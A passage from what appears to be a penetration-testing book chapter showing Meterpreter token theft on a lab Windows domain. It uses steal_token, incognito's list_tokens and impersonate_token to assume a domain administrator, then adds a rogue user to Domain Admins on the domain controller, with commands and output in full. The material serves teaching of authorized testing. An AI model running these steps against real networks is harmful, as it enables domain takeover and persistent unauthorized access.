88
Chapter 6
As shown in the following listing, we leverage
steal_token
and the PID
(380 in this case) to steal the token of that user and assume the role of the
domain administrator:
meterpreter >
steal_token 380
Stolen token with username: SNEAKS.IN\ihazdomainadmin
meterpreter >
We have successfully impersonated the domain administrator account
and Meterpreter is now running under the context of that user.
In some cases,
ps
may not list a running process running as a domain
administrator. We can leverage
incognito
to list available tokens on the system
as well. When performing a penetration test, we should check the output of
both
ps
and
icognito
because the results may vary.
We load
incognito
with
use incognito
and then list tokens with
list_tokens -u
.
Looking through the list of tokens, we see the
SNEAKS.IN\ihazdomainadmin
user
account at . Now we can pretend to be someone else.
meterpreter >
use incognito
Loading extension incognito...success.
meterpreter >
list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================
SNEAKS.IN\ihazdomainadmin
IHAZSECURITY\Administrator
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
As shown in the next listing, we successfully impersonate the
ihazdomainadmin
token at and add a user account at , which we then give domain admin-
istrator rights at . (Be sure to use two backslashes,
\\
, when entering the
DOMAIN\USERNAME
at .) Our domain controller is 192.168.33.50.
meterpreter >
impersonate_token SNEAKS.IN\\ihazdomainadmin
[+] Delegation token available
[+] Successfully impersonated user SNEAKS.IN\ihazdomainadmin
meterpreter >
add_user omgcompromised p@55w0rd! -h 192.168.33.50
[*] Attempting to add user omgcompromised to host 192.168.33.50
[+] Successfully added user
meterpreter >
add_group_user "Domain Admins" omgcompromised -h 192.168.33.50
[*] Attempting to add user omgcompromised to group Domain Admins on domain controller
192.168.33.50
[+] Successfully added user to group